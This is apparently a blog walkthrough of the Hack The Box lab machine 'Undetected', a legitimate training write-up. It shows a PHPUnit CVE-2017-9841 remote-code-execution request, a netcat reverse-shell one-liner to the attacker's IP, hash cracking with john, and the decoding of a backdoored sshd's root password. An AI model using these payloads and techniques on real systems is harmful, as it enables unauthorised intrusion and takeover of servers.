Posts Undetected HTB Walkthrough
Post
Cancel

Undetected HTB Walkthrough

Posted May 12 2022-05-12T14:49:51+02:00 by Mohamed Ezzat

Machine Info

  • OS: Linux
  • Difficulty: Medium
  • Points: 30
  • Release: 19 Feb 2022
  • IP: 10.10.11.146

Network Scanning

There are three ports found by nmap ssh:22, http:80 and http:5678

1

nmap -p- -T4 -A  10.10.11.146

nmap

Enumeration

By checking the website, there is a subdomain “store.djewelry.htb”. So, add it to “/etc/hosts” then check it.

etc_hosts subdomain

Nothing interested at “store.djewelry.htb”. We run gobuster to find any other interested directories or files and we found a directory “vendor” that looks interested.

1

gobuster dir -u http://store.djewelry.htb/ -w /usr/share/wordlist/dirb/common.txt

gobuster

Checking “vendor” directory, we found a directory called “phpunit” and after checking its files it seems version 5.6 which is vulnerable to RCE CVE-2017-9841.

vendor phpunit

Exploitation

Applying the exploit to make sure is our case vulnerable or not, and yes it seems vulnerable.

1

curl -x POST --proxy 127.0.0.1:8080 http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -d "<?=phpinfo()?>" -s

phpinfo phpinfo

Now let’s conduct a reverse shell.

1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f

revshell

Privilege Escalation

User Steven

While enumerating over system files, we found an executable file called “info” in backup directory. Let’s take a copy of that file to our machine for investigation.

nc nc

Using strings command, we got a hex format that maybe useful.

1

strings info

nc

Decoding that hex gives us a text contains password hash then we crack that hash using john command and we got a password “ihatehackers”.

1
2
3

echo <hex format> | xxd -r -p
echo '$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

john

Taking a look over “/etc/passwd” file to know system users. We have two users “steven” and “steven1”. We tried to use the password that we got and it works with “steven1” to log in. As well as, we got the user flag.

1
2
3

tail /etc/passwd
su steven
su steven1

user_flag

Root

After we logged in as steven, we run linpeas and we found an email from root to steven shows that there is strange behavior with the apache service. Therefore, we check the /lib/apache2/modules directory and we found “mod_reader.so” with an updated date than others.

1
2
3
4
5

./linpeas.sh
cd /var/mail
cat steven
cd /lib/apache2/modules
ls -l

linpeas mail mod_reader

Copying “mod_reader.so” to our local machine for investigation. Using strings again, we found a base64 format. Decode it, we notice that maybe there is something suspisuos with sshd. Therefore, we copy sshd to analyze it locally.

1
2

strings mod_reader.so
echo <base64 format> | base64 -d

strings_mod_reader base64_decode

Using Ghidra, after spending a lot of time with that sshd trying to find what maybe look suspicious. The name of that machine is “Undetected” so maybe it refers to an undetected backdoor. Therefore, we search for “backdoor” and we found that there is a function called “auth_password” that contains a backdoor array.

ghidra

That backdoor array contains hex values but we need to order them in a right way. Consider that the first value of the backdoor has been assigned in a negative format “-0x5b” which is invalid and its positive value is “0xa5” from the assembly code. As well as, we notice that there is a xoring operation with “0x96” inside the while loop.

backdoor_reordering

Then we use CyberChef and add (Swap endianness, From Hex and XOR) operations.

cyberchef

Trying to use the CyberChef result value as root password and it works successfully.

1
2

ssh root@10.10.11.146
cat root.txt

root

Hack The Box
htb boot2root ethical hacking
This post is licensed under CC BY 4.0 by the author.
Contents

Late HTB Walkthrough

Timing HTB Walkthrough